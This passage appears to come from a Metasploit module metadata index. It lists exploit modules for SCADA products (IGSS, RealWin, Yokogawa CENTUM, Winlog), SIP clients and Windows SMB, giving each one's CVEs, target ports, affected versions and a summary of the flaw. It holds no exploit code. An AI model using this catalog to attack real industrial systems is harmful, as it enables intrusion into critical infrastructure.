"name": "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",
"full_name": "exploit/windows/scada/igss9_misc",
"rank": 600,
"disclosure_date": "2011-03-24",
"type": "exploit",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n Data Collector services. The approach is to first transfer our binary\n with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n that payload with a CreateProcessA() function as a new thread.",
"references": [
"CVE-2011-1565",
"CVE-2011-1566",
"OSVDB-72354",
"OSVDB-72349",
"URL-http://aluigi.altervista.org/adv/igss_1-adv.txt",
"URL-http://aluigi.altervista.org/adv/igss_8-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP",
"Windows 7",
"Windows Server 2003 / R2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss9_misc.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss9_misc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/igss_exec_17": {
"name": "Interactive Graphical SCADA System Remote Command Injection",
"full_name": "exploit/windows/scada/igss_exec_17",
"rank": 600,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.",
"references": [
"CVE-2011-1566",
"OSVDB-72349",
"URL-http://aluigi.org/adv/igss_8-adv.txt"
],
"platform": "Windows",
"arch": "cmd",
"rport": 12397,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/igss_exec_17.rb",
"is_install_path": true,
"ref_name": "windows/scada/igss_exec_17",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/indusoft_webstudio_exec": {
"name": "InduSoft Web Studio Arbitrary Upload Remote Code Execution",
"full_name": "exploit/windows/scada/indusoft_webstudio_exec",
"rank": 600,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and authorization on the InduSoft\n Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to\n the filesystem, by abusing the functions provided by the software.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre\n Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows\n XP SP3 and Windows 2003 SP2.",
"references": [
"CVE-2011-4051",
"OSVDB-77179",
"BID-50675",
"ZDI-11-330"
],
"platform": "Windows",
"arch": "",
"rport": 4322,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP / 2003"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/indusoft_webstudio_exec.rb",
"is_install_path": true,
"ref_name": "windows/scada/indusoft_webstudio_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/moxa_mdmtool": {
"name": "MOXA Device Manager Tool 2.1 Buffer Overflow",
"full_name": "exploit/windows/scada/moxa_mdmtool",
"rank": 500,
"disclosure_date": "2010-10-20",
"type": "exploit",
"author": [
"Ruben Santamarta",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n When sending a specially crafted MDMGw (MDM2_Gateway) response, an\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4741",
"OSVDB-69027",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MOXA MDM Tool 2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/moxa_mdmtool.rb",
"is_install_path": true,
"ref_name": "windows/scada/moxa_mdmtool",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/procyon_core_server": {
"name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow",
"full_name": "exploit/windows/scada/procyon_core_server",
"rank": 300,
"disclosure_date": "2011-09-08",
"type": "exploit",
"author": [
"Knud Hojgaard <keh@nsense.dk>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a vulnerability in the coreservice.exe component of Procyon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows overwriting a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. Also, after the\n payload exits, Coreservice.exe should automatically recover.",
"references": [
"CVE-2011-3322",
"OSVDB-75371",
"URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow"
],
"platform": "Windows",
"arch": "",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 - No dep bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/procyon_core_server.rb",
"is_install_path": true,
"ref_name": "windows/scada/procyon_core_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin": {
"name": "DATAC RealWin SCADA Server Buffer Overflow",
"full_name": "exploit/windows/scada/realwin",
"rank": 500,
"disclosure_date": "2008-09-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.0.10.37).\n By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-4322",
"OSVDB-48606",
"BID-31418"
],
"platform": "Windows",
"arch": "",
"rport": 910,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_on_fc_binfile_a": {
"name": "DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_on_fc_binfile_a",
"rank": 500,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability found in DATAC Control International RealWin\n SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n packet via port 910, RealWin will try to create a file (which would be saved to\n C:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n supplied filename with an inline memcpy routine without proper bounds checking, which\n results in a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n Tested version: 2.0 (Build 6.1.8.10)",
"references": [
"CVE-2011-1563",
"OSVDB-72826",
"BID-46937",
"URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 910,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_on_fc_binfile_a",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_on_fcs_login": {
"name": "RealWin SCADA Server DATAC Login Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_on_fcs_login",
"rank": 500,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>",
"B|H <bh[AT]bufferattack.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n packet containing a long username, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2011-1563",
"OSVDB-72824",
"URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt",
"URL-http://www.dataconline.com/software/realwin.php",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 910,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_on_fcs_login.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_on_fcs_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_scpc_initialize": {
"name": "DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_scpc_initialize",
"rank": 500,
"disclosure_date": "2010-10-15",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-68812",
"CVE-2010-4142",
"URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 912,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_scpc_initialize.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_scpc_initialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_scpc_initialize_rf": {
"name": "DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_scpc_initialize_rf",
"rank": 500,
"disclosure_date": "2010-10-15",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-68812",
"CVE-2010-4142",
"URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 912,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_scpc_initialize_rf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_scpc_txtevent": {
"name": "DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_scpc_txtevent",
"rank": 500,
"disclosure_date": "2010-11-18",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4142",
"OSVDB-68812"
],
"platform": "Windows",
"arch": "",
"rport": 912,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_scpc_txtevent.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_scpc_txtevent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/scadapro_cmdexe": {
"name": "Measuresoft ScadaPro Remote Command Execution",
"full_name": "exploit/windows/scada/scadapro_cmdexe",
"rank": 600,
"disclosure_date": "2011-09-16",
"type": "exploit",
"author": [
"Luigi Auriemma",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <tecr0c@tecninja.net>"
],
"description": "This module allows remote attackers to execute arbitrary commands on the\n affected system via a directory traversal attack when using the\n 'xf' command (execute function). An attacker can execute system() from\n msvcrt.dll to upload a backdoor and gain remote code execution. This\n vulnerability affects version 4.0.0 and earlier.",
"references": [
"CVE-2011-3497",
"OSVDB-75490",
"BID-49613",
"URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt",
"URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf",
"URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx"
],
"platform": "Windows",
"arch": "",
"rport": 11234,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/scadapro_cmdexe.rb",
"is_install_path": true,
"ref_name": "windows/scada/scadapro_cmdexe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/sunway_force_control_netdbsrv": {
"name": "Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",
"full_name": "exploit/windows/scada/sunway_force_control_netdbsrv",
"rank": 500,
"disclosure_date": "2011-09-22",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Rinat Ziyayev",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow found in the SNMP\n NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is\n triggered when sending an overly long string to the listening service\n on port 2001.",
"references": [
"OSVDB-75798",
"BID-49747",
"URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": 2001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb",
"is_install_path": true,
"ref_name": "windows/scada/sunway_force_control_netdbsrv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/winlog_runtime": {
"name": "Sielco Sistemi Winlog Buffer Overflow",
"full_name": "exploit/windows/scada/winlog_runtime",
"rank": 500,
"disclosure_date": "2011-01-13",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Sielco\n Sistemi Winlog <= 2.07.00. When sending a specially formatted\n packet to the Runtime.exe service, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2011-0517",
"OSVDB-70418",
"URL-http://aluigi.org/adv/winlog_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-017-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 46823,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winlog Lite 2.07.00"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/winlog_runtime.rb",
"is_install_path": true,
"ref_name": "windows/scada/winlog_runtime",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/winlog_runtime_2": {
"name": "Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16",
"full_name": "exploit/windows/scada/winlog_runtime_2",
"rank": 300,
"disclosure_date": "2012-06-04",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a buffer overflow in Sielco Sistemi Winlog <= 2.07.16.\n When sending a specially formatted packet to the Runtime.exe service on port 46824,\n an attacker may be able to execute arbitrary code.",
"references": [
"BID-53811",
"CVE-2012-3815",
"OSVDB-82654",
"EDB-18986",
"URL-http://www.s3cur1ty.de/m1adv2012-001",
"URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html"
],
"platform": "Windows",
"arch": "",
"rport": 46824,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project",
"Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/winlog_runtime_2.rb",
"is_install_path": true,
"ref_name": "windows/scada/winlog_runtime_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkbcopyd_bof": {
"name": "Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkbcopyd_bof",
"rank": 300,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.",
"references": [
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
"CVE-2014-0784"
],
"platform": "Windows",
"arch": "",
"rport": 20111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkbcopyd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkesimmgr_bof": {
"name": "Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkesimmgr_bof",
"rank": 300,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n insecure usage of memcpy, using attacker controlled data as the size count. This module\n has been tested successfully on Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.",
"references": [
"CVE-2014-0782",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 34205,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkesimmgr_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkfsim_vhfd": {
"name": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkfsim_vhfd",
"rank": 300,
"disclosure_date": "2014-05-23",
"type": "exploit",
"author": [
"Redsadic <julian.vilas@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.",
"references": [
"CVE-2014-3888",
"URL-http://jvn.jp/vu/JVNVU95045914/index.html",
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
],
"platform": "Windows",
"arch": "",
"rport": 20010,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkfsim_vhfd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkhodeq_bof": {
"name": "Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkhodeq_bof",
"rank": 200,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.",
"references": [
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
"CVE-2014-0783"
],
"platform": "Windows",
"arch": "",
"rport": 20171,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkhodeq_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/sip/aim_triton_cseq": {
"name": "AIM Triton 1.0.4 CSeq Buffer Overflow",
"full_name": "exploit/windows/sip/aim_triton_cseq",
"rank": 500,
"disclosure_date": "2006-07-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in AOL's AIM\n Triton 1.0.4. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.",
"references": [
"CVE-2006-3524",
"OSVDB-27122",
"BID-18906"
],
"platform": "Windows",
"arch": "",
"rport": 5061,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"AIM Triton 1.0.4 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/sip/aim_triton_cseq.rb",
"is_install_path": true,
"ref_name": "windows/sip/aim_triton_cseq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/sip/sipxezphone_cseq": {
"name": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",
"full_name": "exploit/windows/sip/sipxezphone_cseq",
"rank": 500,
"disclosure_date": "2006-07-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. By sending a long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.",
"references": [
"CVE-2006-3524",
"OSVDB-27122",
"BID-18906"
],
"platform": "Windows",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"sipXezPhone 0.35a Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/sip/sipxezphone_cseq.rb",
"is_install_path": true,
"ref_name": "windows/sip/sipxezphone_cseq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/sip/sipxphone_cseq": {
"name": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",
"full_name": "exploit/windows/sip/sipxphone_cseq",
"rank": 500,
"disclosure_date": "2006-07-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.",
"references": [
"CVE-2006-3524",
"OSVDB-27122",
"BID-18906"
],
"platform": "Windows",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SIPfoundry sipXphone 2.6.0.27 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/sip/sipxphone_cseq.rb",
"is_install_path": true,
"ref_name": "windows/sip/sipxphone_cseq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/generic_smb_dll_injection": {
"name": "Generic DLL Injection From Shared Resource",
"full_name": "exploit/windows/smb/generic_smb_dll_injection",
"rank": 0,
"disclosure_date": "2015-03-04",
"type": "exploit",
"author": [
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This is a general-purpose module for exploiting conditions where a DLL can be loaded\n from a specified SMB share. This module serves payloads as DLLs over an SMB service.",
"references": [
"CWE-114"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/smb/generic_smb_dll_injection.rb",
"is_install_path": true,
"ref_name": "windows/smb/generic_smb_dll_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/group_policy_startup": {
"name": "Group Policy Script Execution From Shared Resource",
"full_name": "exploit/windows/smb/group_policy_startup",
"rank": 0,
"disclosure_date": "2015-01-26",
"type": "exploit",
"author": [
"Sam Bertram <sbertram@gdssecurity.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This is a general-purpose module for exploiting systems with Windows Group Policy\n configured to load VBS startup/logon scripts from remote locations. This module runs\n an SMB shared resource that will provide a payload through a VBS file. Startup scripts\n will be executed with SYSTEM privileges, while logon scripts will be executed with the\n user privileges. Note that the attacker still needs to redirect the\n target traffic to the fake SMB share to exploit it successfully. Please note in some\n cases, it will take 5 to 10 minutes to receive a session.",
"references": [
"URL-http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html",
"URL-https://github.com/GDSSecurity/BadSamba"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/group_policy_startup.rb",
"is_install_path": true,
"ref_name": "windows/smb/group_policy_startup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ipass_pipe_exec": {
"name": "IPass Control Pipe Remote Command Execution",
"full_name": "exploit/windows/smb/ipass_pipe_exec",
"rank": 600,
"disclosure_date": "2015-01-21",
"type": "exploit",
"author": [
"Matthias Kaiser",
"h0ng10 <info@mogwaisecurity.de>"
],
"description": "This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused\n to force the service to load a DLL from a SMB share.",
"references": [
"CVE-2015-0925",
"OSVDB-117423",
"BID-72265",
"URL-http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows x32",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ipass_pipe_exec.rb",
"is_install_path": true,
"ref_name": "windows/smb/ipass_pipe_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms03_049_netapi": {
"name": "MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow",
"full_name": "exploit/windows/smb/ms03_049_netapi",
"rank": 400,
"disclosure_date": "2003-11-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n function using the Workstation service in Windows XP.",
"references": [
"CVE-2003-0812",
"OSVDB-11461",
"BID-9011",
"MSB-MS03-049"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows XP SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms03_049_netapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms03_049_netapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms04_007_killbill": {
